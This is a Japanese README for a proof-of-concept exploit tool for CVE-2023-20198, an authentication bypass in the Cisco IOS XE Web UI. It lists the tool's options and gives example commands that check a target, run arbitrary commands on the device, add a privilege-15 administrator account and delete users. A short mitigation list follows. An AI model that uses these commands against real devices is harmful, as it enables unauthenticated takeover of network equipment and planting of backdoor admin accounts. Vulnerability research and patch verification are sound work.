
CVE-2023-20198 の概念実証エクスプロイト。Cisco IOS XE Web UI に影響を与える認証バイパスの脆弱性。
このリポジトリには、Cisco IOS XE Web UI に影響を与える認証バイパスの脆弱性 CVE-2023-20198 の 概念実証エクスプロイト が含まれています。
この脆弱性により、認証されていない攻撃者 が細工された SOAP リクエストを介して脆弱な Cisco デバイス上で任意のコマンドを実行でき、リモートコマンド実行、管理者ユーザーの作成/削除を含むデバイスの完全な侵害につながる可能性があります。
CVE: CVE-2023-20198
影響を受ける製品: Cisco IOS XE (Web UI / WSMA Interface)
影響:
攻撃ベクトル: ネットワーク (HTTP/HTTPS)
必要な権限: なし (認証不要)
この脆弱性は、Web Services Management Agent (WSMA) エンドポイントにおける不適切な認証処理によって引き起こされ、攻撃者が細工された HTTP リクエストを使用して認証をバイパスすることを可能にします。
requestscolorama依存関係のインストール:
pip install -r requirements.txt
usage: main.py [-h] -t TARGET [-c] [-C CMD] [-a] [-d] [-u USERNAME] [-p PASSWORD]
Cisco IOS XE デバイス向け認証バイパスエクスプロイト (CVE-2023-20198)
options:
-h, --help このヘルプメッセージを表示して終了
-t TARGET, --target TARGET
ターゲット Cisco IOS XE デバイス
-c, --check ターゲットが CVE-2023-20198 に対して脆弱かどうかを確認
-C CMD, --cmd CMD 実行する Cisco IOS XE コマンド
-a, --add 新しいユーザー名とパスワードを追加
-d, --delete 既存のユーザーを削除
-u USERNAME, --username USERNAME
アカウント作成用のユーザー名
-p PASSWORD, --password PASSWORD
アカウント作成用のパスワード (指定がない場合はランダムなパスワードが生成されます)

ターゲットが脆弱かどうかを確認します:
python3 exploit.py -t https://<TARGET-IP> -c

脆弱な場合、ツールは自動的に悪用可能な WSMA エンドポイントを検出し、デバイスの詳細を表示します。
脆弱なデバイス上でコマンドを実行します:
python3 exploit.py -t https://<TARGET-IP> -C "<COMMAND>"
例:
python3 exploit.py -t https://<TARGET-IP> -C "show running | include username"

新しい特権レベル 15 の管理者ユーザーを作成します:
python3 exploit.py -t https://<TARGET-IP> -a -u cisco -p kaptaan

パスワードが指定されていない場合、スクリプトはランダムな安全なパスワードを自動生成します。
新しく作成したアカウントを使用して、デバイスの Web UI にアクセスできます。

既存のユーザーを削除します:
python3 exploit.py -t https://<TARGET-IP> -d -u cisco

Cisco IOS XE を最新のパッチ適用済みバージョンにアップグレードする
不要な場合は Web UI を無効にする:
no ip http server
no ip http secure-server
ACL を介して管理アクセスを制限する
| オプション | 説明 |
|---|
-t, --target | ターゲット Cisco IOS XE デバイス (必須) |
-c, --check | ターゲットが脆弱かどうかを確認 |
-C, --cmd | Cisco IOS XE コマンドを実行 |
-a, --add | 新しい管理ユーザーを追加 |
-d, --delete | 既存のユーザーを削除 |
-u, --username | アカウント作成/削除用のユーザー名 |
-p, --password | 新しいアカウントのパスワード (指定がない場合はランダム) |